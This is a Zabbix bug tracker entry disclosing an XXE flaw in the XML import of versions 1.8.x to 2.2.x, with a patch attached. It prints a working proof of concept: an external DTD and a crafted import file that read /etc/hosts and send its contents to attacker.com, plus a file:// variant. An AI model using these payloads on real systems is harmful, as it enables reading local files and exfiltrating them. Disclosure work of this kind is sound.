Uploaded image for project: 'ZABBIX BUGS AND ISSUES'
  1. ZABBIX BUGS AND ISSUES
  2. ZBX-8151

Zabbix 1.8.x-2.2.x Local File Inclusion via XXE Attack

    Details

      Description

      zabbix frontend support xml data import feature,and server-side use DOMDocument to parse xml.DOMDocument also parse the external dtd in default.So attacker can use a crafted xml to read arbitrary local file and send http request use zabbix server as a proxy.

      ==Reproduction:
      ext.dtd place at http://attacker.com/
      <!ENTITY % all
      "<!ENTITY % send SYSTEM 'http://attacker.com/?%file;'>"
      >
      %all;

      zabbix.xml to import:
      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE root [
      <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/hosts">
      <!ENTITY % dtd SYSTEM "http://attacker.com/ext.dtd">
      %dtd;
      %send;
      ]]>
      <zabbix_export>
      </zabbix_export>
      After import zabbix.xml to zabbix server,the contents of hosts file will send to attacker.com.Attacker can get the content by checking the website access log. If use file:///etc/hosts to replace php://filter/read=convert.base64-encode/resource=/etc/hosts.the file content will print on the web page as an error directly.

      ==
      This bug was found by pnig0s@Freebuf

        Attachments

        1. poc_screenshot_01.jpg
          46 kB
          pnig0s
        2. poc_screenshot_02.jpg
          55 kB
          pnig0s
        3. ZBX_8151_2_2_2.patch
          2 kB
          Andrejs Čirkovs

          Activity

            People

            • Assignee:
              Unassigned
              Reporter:
              pnig0s pnig0s
            • Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: